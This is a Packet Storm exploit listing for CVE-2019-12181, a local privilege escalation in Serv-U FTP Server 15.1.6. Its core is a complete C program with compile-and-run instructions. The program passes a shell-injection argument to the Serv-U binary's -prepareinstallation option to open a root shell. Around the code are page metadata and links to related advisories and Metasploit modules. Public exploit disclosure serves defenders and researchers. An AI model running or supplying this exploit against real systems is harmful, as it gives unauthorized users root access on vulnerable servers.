Lucene search
Guy LevinPACKETSTORM:153333HistoryJun 18, 2019 - 12:00 a.m.
Serv-U FTP Server 15.1.6 Privilege Escalation
2019-06-1800:00:00
Guy Levin
packetstormsecurity.com
107
0.114 Low
EPSS
Percentile
95.3%
`/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}
`
Related
cve
cve
CVE-2019-12181
2019-06-17 16:15:12
exploitpack
exploitpack
Serv-U FTP Server 15.1.7 - Local Privilege Escalation (1)
2019-06-18 00:00:00
Serv-U FTP Server 15.1.7 - Local Privilege Escalation (2)
2019-01-13 00:00:00
cvelist
cvelist
CVE-2019-12181
2019-06-17 15:16:26
attackerkb
attackerkb
Serv-U FTP Server prepareinstallation Privilege Escalation
2019-06-17 00:00:00
zdt
zdt
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit
2019-06-18 00:00:00
Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit
2019-07-02 00:00:00
metasploit
metasploit
Serv-U FTP Server prepareinstallation Privilege Escalation
2019-06-29 03:52:53
packetstorm
packetstorm
Serv-U FTP Server prepareinstallation Privilege Escalation
2019-07-02 00:00:00
prion
prion
Privilege escalation
2019-06-17 16:15:00
nvd
nvd
CVE-2019-12181
2019-06-17 16:15:12
exploitdb
exploitdb
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
2019-07-03 00:00:00
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)
2019-01-13 00:00:00
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
2019-06-18 00:00:00